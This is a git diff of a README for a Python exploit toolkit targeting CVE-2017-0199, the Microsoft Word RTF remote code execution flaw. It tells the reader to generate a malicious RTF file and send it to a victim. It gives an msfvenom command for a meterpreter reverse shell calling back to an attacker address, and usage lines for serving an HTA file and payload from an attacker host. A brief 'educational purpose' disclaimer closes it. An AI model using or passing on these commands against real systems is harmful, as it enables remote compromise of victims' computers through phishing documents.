diff --git a/README.md b/README.md index dc60bc3..7a227bb 100644 --- a/README.md +++ b/README.md @@ -1,49 +1,85 @@ -## This is an article with video tutorial and tool to gain a meterpreter shell by exploiting CVE-2017-0199 (Word RTF RCE) vulnerability. +## Exploit toolkit CVE-2017-0199 - v2.0 -### Video tutorial +Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration. -https://youtu.be/ymLVH5avkZw - -### Steps -##### Step-1) Create a malicious RTF - - Start a webserver on attacker machine (Kali Linux) - - Upload innocent.doc in public folder - - On windows machine, open MS Office word and insert an innocent remote doc file (innocent.doc) from attacker machine as an object - - Save the file as RTF - - Modify RTF to inject \objupdate control - - Stop the webserver on attacker machine - - Share this RTF file with victim +### Release note: +Introduced following capabilities to the script -##### Step-2) Create a meterpreter shell on attacker machine (Kali Linux) - - msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe - - Start multi handler + - Generate Malicious RTF file using toolkit + - Run toolkit in an exploitation mode with tiny HTA + Web server +### Example: -##### Step-3) Start attacker script (server.py) on the attacker machine where the innocent.doc was uploaded (Kali Linux) - - Specify URL of meterpreter shell - - Specify location of shell +- Step 1: Generate malicious RTF file using following command and send it to victim + Syntax + + # python cve-2017-0199_toolkit.py -M gen -w -u + + Example: + + # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc + + +- Step 2 (Optional, if payload is available) : Generate metasploit payload + + Example: + + #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe + +- Step 3: Start toolkit in exploitation mode to deliver payloads + + Syntax: + + #python cve-2017-0199_toolkit.py -M exp -e -l + + Example: + + #python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe + + + +### Command line arguments: + + #python cve-2017-0199_toolkit.py -h -##### Step-4) Victim opens the document and an attacker gets a reverse meterpreter shell + This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) + Modes: + -M gen Generate Malicious RTF file only + Generate malicious RTF file: + -w Name of malicious RTF file (Share this file with victim). + -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. + For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and + will be requested once victim will open malicious RTF file. + -M exp Start exploitation mode + Exploitation: + -p Local port number. + -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. + -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally). ### Disclaimer This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility. +### Credit + +@nixawk for RTF sample +@bhdresh + ### Bug, issues, feature requests Obviously, I am not a fulltime developer so expect some hiccups